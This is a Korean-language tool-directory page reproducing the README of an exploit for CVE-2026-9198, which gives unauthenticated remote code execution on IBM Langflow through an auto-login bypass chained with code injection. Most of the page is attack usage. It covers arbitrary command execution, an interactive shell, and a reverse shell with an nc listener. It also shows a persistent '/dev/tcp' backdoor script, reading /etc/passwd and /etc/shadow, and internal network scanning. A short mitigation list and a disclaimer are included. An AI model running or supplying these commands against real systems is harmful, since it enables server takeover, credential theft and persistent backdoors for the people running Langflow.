Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
도구/GitHubGitHub/0xgh057r3c0n/cve-2026-9198
Payload GenerationExploitationWeb Application ExploitationCommand and ControlAuthenticationRed TeamingRemote Access Tool
GitHub0xgh057r3c0n/cve-2026-9198

CVE-2026-9198

IBM Langflow 자동 로그인 우회를 통한 인증되지 않은 RCE

저장소 보기
127일 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
Langflow 로고

🚨 CVE-2026-9198

IBM Langflow OSS 자동 로그인 우회를 통한 무인증 RCE

License: MIT Python 3.6+ Security


📋 개요

CVE-2026-9198는 IBM Langflow OSS에서 발생하는 치명적인 무인증 원격 코드 실행(RCE) 취약점입니다. 이 익스플로잇은 두 가지 취약점을 연쇄적으로 이용합니다:

  • CVE-2026-9103: 무인증 호출자에게 슈퍼유저 JWT 토큰을 부여하는 자동 로그인 우회
  • CVE-2026-8481: 임의 Python 코드 실행을 허용하는 /api/v1/validate/code 엔드포인트의 코드 인젝션

⚠️ 경고: 이 도구는 승인된 보안 테스트 및 교육 목적으로만 사용해야 합니다. 무단 사용은 불법입니다.


🚀 기능

  • 🔓 자동 로그인 우회 - 슈퍼유저 JWT 토큰 자동 획득
  • 💻 대화형 유사 셸 - 사용자 이름과 현재 디렉터리를 표시하는 동적 프롬프트
  • 📝 단일 명령 실행 - 임의의 시스템 명령 실행
  • 🔄 리버스 셸 - 원라이너 리버스 셸 페이로드 전달
  • 🎨 컬러 출력 - ANSI 색상을 통한 시각적 피드백
  • ⚡ 빠르고 안정적 - 견고한 오류 처리로 구축

📦 설치

사전 요구 사항

  • Python 3.6 이상
  • pip 패키지 관리자

1단계: 저장소 클론

root@kitploit:~
git clone https://github.com/0xgh057r3c0n/CVE-2026-9198.git
cd CVE-2026-9198

2단계: 의존성 설치

root@kitploit:~
pip install termcolor

또는 모든 의존성을 한 번에 설치:

root@kitploit:~
pip install -r requirements.txt

3단계: 설치 확인

root@kitploit:~
python CVE-2026-9198.py --help

모든 사용 가능한 옵션이 포함된 도움말 메뉴가 표시됩니다.


🎯 사용법

기본 명령 실행

대상에서 단일 명령을 실행합니다:

root@kitploit:~
python CVE-2026-9198.py -t <target_ip> -c "id"

예시:

root@kitploit:~
python CVE-2026-9198.py -t 192.168.1.100 -c "whoami"

대화형 유사 셸

동적 프롬프트가 포함된 대화형 셸을 실행합니다:

root@kitploit:~
python CVE-2026-9198.py -t <target_ip> --shell

기능:

  • user@host 및 현재 디렉터리를 표시하는 동적 프롬프트
  • 자동 프롬프트 업데이트를 지원하는 cd 명령
  • 명령 기록 (터미널에 따라 다름)
  • 깔끔한 출력 형식

예시 세션:

root@kitploit:~
┌─[root@0xgh057r3c0n]─[~]
└──╼ $ whoami
root
┌─[root@0xgh057r3c0n]─[~]
└──╼ $ cd /tmp
┌─[root@0xgh057r3c0n]─[/tmp]
└──╼ $ pwd
/tmp

리버스 셸

리스너로 리버스 셸 페이로드를 전송합니다:

root@kitploit:~
python CVE-2026-9198.py -t <target_ip> --lhost <your_ip> --lport <port>

예시:

root@kitploit:~
# On your machine - Start listener
nc -lvnp 4444

# Then run the exploit
python CVE-2026-9198.py -t 192.168.1.100 --lhost 192.168.1.50 --lport 4444

사용자 지정 포트

Langflow가 기본 포트가 아닌 다른 포트에서 실행 중인 경우:

root@kitploit:~
python CVE-2026-9198.py -t <target_ip> -p <port> -c "whoami"

예시:

root@kitploit:~
python CVE-2026-9198.py -t 192.168.1.100 -p 8080 -c "ls -la"

사전 획득 토큰 사용

자동 로그인 프로세스를 건너뛰고 기존 토큰을 사용합니다:

root@kitploit:~
python CVE-2026-9198.py -t <target_ip> -k <your_jwt_token> -c "id"

타임아웃 설정

느린 네트워크에 맞게 HTTP 타임아웃을 조정합니다:

root@kitploit:~
python CVE-2026-9198.py -t <target_ip> --timeout 30 -c "whoami"

📝 명령줄 인자


🔧 예시

1. 기본 정보 수집

root@kitploit:~
python CVE-2026-9198.py -t 192.168.1.100 -c "uname -a"

2. 파일 시스템 탐색

root@kitploit:~
python CVE-2026-9198.py -t 192.168.1.100 --shell
# Then inside the shell:
ls -la
cat /etc/passwd

3. 지속성 백도어

root@kitploit:~
# Create a reverse shell that persists
python CVE-2026-9198.py -t 192.168.1.100 -c "echo 'bash -i >& /dev/tcp/192.168.1.50/4444 0>&1' > /tmp/backdoor.sh && chmod +x /tmp/backdoor.sh && /tmp/backdoor.sh"

4. 네트워크 스캔 (대상 시스템에서)

root@kitploit:~
python CVE-2026-9198.py -t 192.168.1.100 -c "nmap -sP 192.168.1.0/24"

5. 민감한 파일 유출

root@kitploit:~
python CVE-2026-9198.py -t 192.168.1.100 -c "cat /etc/shadow | base64"

🛡️ 완화 방안

이 취약점으로부터 보호하려면:

  1. 운영 환경에서 자동 로그인을 비활성화하세요
  2. Langflow용 IBM 패치를 적용하세요
  3. Langflow 관리 인터페이스에 대한 네트워크 액세스를 제한하세요
  4. /api/v1/auto_login 및 /api/v1/validate/code에 대한 비정상적인 API 요청을 모니터링하세요
  5. 의심스러운 페이로드 패턴을 차단하는 WAF 규칙을 사용하세요

⚠️ 면책 조항

이 도구는 교육 및 승인된 보안 테스트 목적으로만 제공됩니다. 저자는 이 소프트웨어로 인한 오용이나 피해에 대해 책임을 지지 않습니다. 사용자는 관련 법률 및 규정을 준수할 책임이 전적으로 있습니다.


📄 라이선스

이 프로젝트는 MIT 라이선스에 따라 라이선스가 부여됩니다. 자세한 내용은 LICENSE 파일을 참조하세요.


👨‍💻 작성자

0xgh057r3c0n

  • GitHub: @0xgh057r3c0n
  • 보안 연구원 및 침투 테스터

📚 참고 자료

  • CVE-2026-9198 상세 정보
  • CVE-2026-9103 - 자동 로그인 우회
  • CVE-2026-8481 - 코드 인젝션
  • Langflow 공식 사이트

🤝 기여

기여는 언제나 환영합니다! 자유롭게 Pull Request를 제출해 주세요.

  1. 저장소를 Fork하세요
  2. 기능 브랜치를 생성하세요 (git checkout -b feature/AmazingFeature)
  3. 변경 사항을 커밋하세요 (git commit -m 'Add some AmazingFeature')
  4. 브랜치에 푸시하세요 (git push origin feature/AmazingFeature)
  5. Pull Request를 열어 주세요

⭐ 스타 기록

이 도구가 유용하다고 생각되시면 GitHub에서 ⭐를 눌러 주세요!


0xgh057r3c0n이(가) ❤️로 제작했습니다
도구 다운로드
인자설명필수기본값
-t, --target대상 호스트/IP 또는 전체 URL✅ 예-
-p, --portLangflow 포트❌ 아니요7860
-c, --cmd단일 명령 실행❌ 아니요"id"
--shell대화형 유사 셸 모드❌ 아니요False
--lhost리버스 셸 리스너 IP❌ 아니요-
--lport리버스 셸 리스너 포트❌ 아니요4444
-k, --token제공된 베어러 토큰 사용❌ 아니요-
--timeoutHTTP 타임아웃(초)❌ 아니요20
--no-banner배너 숨기기❌ 아니요False